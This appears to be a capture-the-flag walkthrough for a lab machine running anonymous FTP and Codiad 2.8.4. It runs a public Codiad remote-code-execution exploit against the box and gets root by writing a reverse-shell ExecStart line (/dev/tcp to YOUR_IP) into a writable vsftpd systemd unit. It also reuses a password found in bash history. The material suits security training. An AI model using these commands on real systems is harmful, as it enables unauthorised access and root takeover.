As usual, start with an nmap scan to see what the box is running. Scan all ports (-p-) with version detection (-sV): the web server here sits on a high port that a default top-1000 scan would miss.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| FTP server status:
| Connected to ::ffff:10.8.246.255
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Unix
As we can see, port 21 FTP is open and allows anonymous access (log in as anonymous with any password). Use ls -la when browsing, since dot-named entries don't show in a plain listing, and grab the hidden(?) file …/- (directory name is … and filename is –). Rename the file on your system once downloaded: a bare - is treated as stdin/stdout by most tools, so it's awkward to work with. Inside it you'll find 2 possible usernames.
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
It also mentions a default password, so let's find out where that is used. As seen from the nmap scan, there's an HTTP server running on port 62337. The login prompt identifies it as Codiad 2.8.4, and searching exploit-db we can find an authenticated RCE exploit for that version.
Google for the default credentials for Codiad. Start a netcat listener on your machine (nc -lvnp PORT), then run the exploit script with those credentials (MACHINE_IP is the target, YOUR_IP and PORT are your listener):
python codiad.py http://MACHINE_IP:62337/ john password YOUR_IP PORT linux
With this we get a shell. Upgrade it to a proper TTY so that sudo, su and similar commands that need a terminal work:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Doing some enumeration we see that we can read /home/drac/.bash_history, which includes a mysql command line with a password in it. That password is reused for the local account, so use it to switch to drac with su.
As drac, run sudo -l and notice that we can run '/usr/sbin/service vsftpd restart' as root, and that the unit file '/etc/systemd/system/multi-user.target.wants/vsftpd.service' is writable by us (check with ls -l). systemd runs whatever ExecStart that unit names, as root, every time the service is started, so this will be our PrivEsc vector.
Edit the file so that the service's ExecStart spawns a reverse shell as root:
[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1'

[Install]
WantedBy=multi-user.target
You need to reload the systemd unit files before the altered unit takes effect:
systemctl daemon-reload
Then, with a netcat listener waiting on YOUR_IP:PORT, run:
sudo /usr/sbin/service vsftpd restart
and you get a reverse shell as root on your listener.